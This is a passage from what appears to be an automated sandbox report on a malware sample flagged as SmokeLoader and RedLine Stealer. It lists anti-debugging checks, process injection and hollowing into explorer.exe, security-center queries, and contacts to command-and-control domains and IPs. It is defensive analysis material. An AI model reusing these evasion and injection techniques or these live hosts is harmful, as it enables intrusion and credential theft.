                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      barindex
                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\rcvfbteSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042D560 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00570042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00470083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0048092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00480D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00888D13 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\rcvfbteProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_004228F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042C962 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00419905 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeMemory protected: page guard
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0043A800 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_004228F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042BAA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00428310 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exeDomain query: unicupload.top
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exeDomain query: goo.su
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\explorer.exeFile created: 293.exe.10.drJump to dropped file
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\rcvfbteSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\rcvfbteSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeMemory written: C:\Users\user\Desktop\ZA3cYU28Yl.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeMemory written: C:\Users\user\AppData\Local\Temp\A019.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeMemory written: unknown base: 400000 value starts with: 4D5A
                      Contains functionality to inject code into remote processesShow sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)Show sources
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeThread created: C:\Windows\explorer.exe EIP: 5AC1930
                      Source: C:\Users\user\AppData\Roaming\rcvfbteThread created: unknown EIP: 5C11930
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeThread created: unknown EIP: 76B1930
                      Sample uses process hollowing techniqueShow sources
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection unmapped: unknown base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection unmapped: unknown base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection unmapped: unknown base address: 400000
                      .NET source code references suspicious native API functionsShow sources
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: B217.exe.10.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.2.B217.exe.a90000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 27.0.B217.exe.a90000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.B217.exe.1b0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 42.0.B217.exe.1b0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeProcess created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Users\user\AppData\Roaming\rcvfbteProcess created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeProcess created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: explorer.exe, 0000000A.00000000.306398787.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.294840531.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.323374990.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.296309785.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000000A.00000000.323671995.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.307094432.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.295074453.00000000011E0000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.387864621.0000000000D10000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385301320.0000000000D10000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 0000000A.00000000.317718253.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.300343479.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.332149562.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B217.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00419B62 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00419B62 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,AssignProcessToJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,SetNamedPipeHandleState,lstrcpynA,GetCurrentProcessId,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexA,OemToCharA,GetLastError,HeapFree,GetConsoleMode,WriteConsoleOutputCharacterA,GetModuleHandleW,GetConsoleMode,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameA,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBW,UnregisterWaitEx,GlobalLock,CreateIoCompletionPort,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionGuid,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleA,EndUpdateResourceA,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,ReadFileScatter,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000008.00000002.554711794.0000026C8DE3D000.00000004.00000001.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000008.00000002.557118584.0000026C8DF02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 27.2.B217.exe.3fb6f20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3fb6f20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3e7ada0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.405ba90.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.405ba90.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.B217.exe.3e7ada0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.479069139.0000000003E01000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.481840914.0000000004005000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.480913132.0000000003F71000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 20.1.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.1.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.A019.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.A019.exe.6c15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rcvfbte.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.1.ZA3cYU28Yl.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ZA3cYU28Yl.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
